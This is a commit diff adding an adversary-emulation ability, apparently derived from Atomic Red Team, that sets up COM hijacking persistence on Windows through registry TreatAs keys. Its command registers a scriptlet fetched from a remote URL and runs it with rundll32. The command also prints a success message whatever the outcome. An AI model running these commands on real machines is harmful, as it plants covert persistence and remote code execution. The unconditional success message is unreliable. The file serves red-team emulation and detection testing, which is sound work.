fix: correct COM hijacking ability to report success (#597)

data/abilities/persistence/38400f50-9333-4c3e-9764-56380252e4b4.yml

@@ -0,0 +1,38 @@
+- id: 38400f50-9333-4c3e-9764-56380252e4b4
+  name: COM hijacking via TreatAs (Generated from Atomic Red Team)
+  description: |
+    Ability for Event Triggered Execution: Component Object Model Hijacking (ATT&CK T1546.015).
+    Creates a custom CLSID class pointing to the Windows Script Component runtime DLL
+    and hijacks the CLSID for Work Folders Logon Synchronization via TreatAs to establish
+    persistence on user logon.
+    Uses rundll32.exe -sta to trigger the hijacked COM object without requiring a logoff.
+    Generated from Atomic Red Team procedures (33eacead-f117-4863-8eb0-5c6304fbfaa9); review and test safely before use.
+  tactic: persistence
+  technique:
+    attack_id: T1546.015
+    name: 'Event Triggered Execution: Component Object Model Hijacking'
+  privilege: Elevated
+  platforms:
+    windows:
+      psh:
+        command: |
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f;
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f;
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f;
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f;
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f;
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f;
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\WINDOWS\system32\scrobj.dll" /f;
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f;
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f;
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f;
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f;
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f;
+          reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f;
+          $null = Start-Process -FilePath "rundll32.exe" -ArgumentList '-sta "AtomicTest"' -PassThru -ErrorAction SilentlyContinue;
+          Write-Host "COM hijacking via TreatAs completed successfully"
+        cleanup: |
+          reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f 2>$null;
+          reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /f 2>$null;
+          reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f 2>$null;
+          reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f 2>$null